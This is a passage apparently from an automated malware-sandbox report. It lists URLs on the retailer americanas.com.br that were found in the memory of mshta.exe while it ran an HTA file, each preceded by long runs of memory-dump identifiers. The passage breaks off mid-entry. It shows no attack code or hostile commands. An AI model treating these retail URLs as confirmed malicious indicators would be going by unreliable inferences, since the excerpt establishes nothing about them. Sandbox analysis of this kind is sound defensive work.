Source: mshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548538955.0000000005E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541310057.0000000005E2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hm
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/celular-basico?chave=pfm_hm_tt_1_0_c
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/pecas-para-celular?chave=pfm_hm_tt_1
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone/iphone?ordenacao=topSelli
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone?chave=pfm_hm_tt_1_0_smart
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartwatch-e-smartband?chave=pfm_hm_
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefonia
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniameta.largeme
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_hm_tt_1_0_celulares
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_home_smartphones_menu
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares.0E)
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/decoracao
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cervejeira?chave=pfm_hm_tt_1_0_cervejeira
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540858944.0000000005D33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cooktop?chave=pfm_hm_tt_1_0_cooktop
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007B47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/fogao?chave=pfm_hm_tt_1_0_fogao
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540350568.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/freezer?chave=pfm_hm_tt_1_0_freezer
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/geladeira-refrigerador?chave=pfm_hm_tt_1_0_
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-e-seca?chave=pfm_hm_tt_1_0_lava-e-seca
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-loucas?chave=pfm_hm_tt_1_0_lava-loucas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 